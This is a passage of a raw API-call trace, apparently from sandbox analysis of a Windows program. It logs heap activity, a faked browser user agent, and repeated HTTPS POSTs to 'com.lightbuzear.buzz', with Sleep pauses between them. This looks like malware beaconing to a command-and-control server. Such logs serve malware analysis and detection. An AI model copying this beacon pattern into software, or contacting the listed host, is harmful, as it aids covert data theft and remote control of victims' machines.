Flags=0x0, Size=0xd) returned 0x481fb68 [0199.860] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb98 | out: hHeap=0x4780000) returned 1 [0199.860] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0199.860] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb68 | out: hHeap=0x4780000) returned 1 [0199.860] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f5b0 [0199.861] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0199.861] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd30 [0199.861] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f5b0 | out: hHeap=0x4780000) returned 1 [0199.861] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f5b0 [0199.861] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0199.861] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f380 [0199.861] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0199.862] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0199.862] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0199.862] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0199.863] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f380 | out: hHeap=0x4780000) returned 1 [0199.863] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0199.863] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0199.863] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0199.863] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0199.863] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0199.863] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0199.863] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0199.864] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0199.864] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6a0 [0199.864] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0199.864] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fbb0 [0199.864] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0199.864] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fb38 [0199.864] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fbb0 | out: hHeap=0x4780000) returned 1 [0199.864] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0199.864] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb38 | out: hHeap=0x4780000) returned 1 [0199.864] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f380 [0199.864] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0199.864] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0199.864] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f380 | out: hHeap=0x4780000) returned 1 [0199.864] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f380 [0199.864] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0199.864] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48154a0 [0199.865] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0199.874] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0199.875] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0199.875] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0199.875] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48154a0 | out: hHeap=0x4780000) returned 1 [0199.876] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0199.876] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0199.876] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0199.877] FreeLibrary (hLibModule=0x71570000) returned 1 [0199.877] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0199.877] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0199.877] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815388 | out: hHeap=0x4780000) returned 1 [0199.877] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48152c0 | out: hHeap=0x4780000) returned 1 [0199.878] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48151f8 | out: hHeap=0x4780000) returned 1 [0199.878] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814e60 | out: hHeap=0x4780000) returned 1 [0199.878] Sleep (dwMilliseconds=0x2710) [0199.896] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0199.896] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0199.896] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0199.896] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0199.896] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0199.896] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0199.896] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0199.897] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6a0 [0199.897] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0199.897] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fa18 [0199.897] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0199.897] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f808 [0199.897] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa18 | out: hHeap=0x4780000) returned 1 [0199.897] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0199.897] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f808 | out: hHeap=0x4780000) returned 1 [0199.897] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481f928 [0199.897] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814e60 [0199.897] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814e60 | out: hHeap=0x4780000) returned 1 [0199.897] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0199.897] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814d20 [0199.897] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0199.898] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0199.898] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0199.898] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0199.898] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0199.898] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0199.898] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0199.898] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0199.898] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0199.898] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0199.898] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fa18 [0199.898] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0199.898] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f808 [0199.898] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa18 | out: hHeap=0x4780000) returned 1 [0199.898] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0199.898] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f808 | out: hHeap=0x4780000) returned 1 [0199.898] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4814e60 [0199.898] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0199.898] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd30 [0199.899] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814e60 | out: hHeap=0x4780000) returned 1 [0199.899] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814e60 [0199.899] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0199.899] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48152c0 [0199.899] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0199.899] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0199.900] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0199.900] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0199.900] FreeLibrary (hLibModule=0x71780000) returned 1 [0199.900] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48152c0 | out: hHeap=0x4780000) returned 1 [0199.900] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0199.900] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815388 [0199.900] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0199.901] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0199.901] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6e0 [0199.901] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0199.901] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0199.901] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0199.901] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0199.901] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0199.909] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0199.909] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0199.909] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fa18 [0199.909] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0199.909] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fb38 [0199.909] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa18 | out: hHeap=0x4780000) returned 1 [0199.909] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0199.909] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb38 | out: hHeap=0x4780000) returned 1 [0199.910] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481fbb0 [0199.910] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48154a0 [0199.910] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48154a0 | out: hHeap=0x4780000) returned 1 [0199.910] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0199.910] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48153b0 [0199.910] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0199.910] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48154a0 [0199.910] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0199.910] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0199.910] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0199.911] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0199.911] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0199.911] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0199.911] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0199.911] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6e0 [0199.911] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0199.911] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fb38 [0199.911] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0199.911] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481faf0 [0199.911] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb38 | out: hHeap=0x4780000) returned 1 [0199.911] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0199.911] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481faf0 | out: hHeap=0x4780000) returned 1 [0199.911] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481fb50 [0199.911] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48151f8 [0199.911] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48151f8 | out: hHeap=0x4780000) returned 1 [0199.912] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0199.912] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0199.912] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6d0 [0199.912] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0199.912] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0199.912] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0199.912] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0199.913] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0199.913] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0199.913] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0199.913] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0199.913] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fb68 [0199.913] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0199.913] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fb98 [0199.913] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb68 | out: hHeap=0x4780000) returned 1 [0199.913] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0199.913] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb98 | out: hHeap=0x4780000) returned 1 [0199.913] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48152c0 [0199.913] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0199.913] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0199.913] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48152c0 | out: hHeap=0x4780000) returned 1 [0199.913] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48151f8 [0199.913] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb978 [0199.913] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48152c0 [0199.913] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0199.914] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0199.914] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0199.914] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0199.914] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48152c0 | out: hHeap=0x4780000) returned 1 [0199.914] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0199.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0199.915] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0199.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6e0 [0199.915] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0199.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0199.915] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0199.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6c0 [0199.915] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0199.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fb20 [0199.915] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0199.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fb08 [0199.915] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb20 | out: hHeap=0x4780000) returned 1 [0199.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0199.915] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb08 | out: hHeap=0x4780000) returned 1 [0199.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48152c0 [0199.915] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0199.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd30 [0199.915] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48152c0 | out: hHeap=0x4780000) returned 1 [0199.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48152c0 [0199.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0199.915] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9d98 [0199.916] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0199.916] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0199.916] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0199.933] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0201.122] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9d98 | out: hHeap=0x4780000) returned 1 [0201.122] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0201.122] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0201.122] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0201.122] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0201.122] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5f0 [0201.122] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0201.122] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0201.123] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0201.123] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0201.123] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0201.123] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0201.123] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0201.123] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fb20 [0201.123] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0201.123] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fb68 [0201.123] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb20 | out: hHeap=0x4780000) returned 1 [0201.123] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0201.123] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb68 | out: hHeap=0x4780000) returned 1 [0201.123] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47f9d98 [0201.123] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0201.123] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0201.123] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9d98 | out: hHeap=0x4780000) returned 1 [0201.123] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9f00 [0201.123] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0201.123] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9d98 [0201.123] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0201.124] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0201.124] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0201.124] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0201.124] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9d98 | out: hHeap=0x4780000) returned 1 [0201.124] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0201.124] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6c0 [0201.125] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5f0 [0201.125] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0201.125] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0201.125] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0201.125] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0201.125] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0201.125] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0201.125] HeapFree (in: 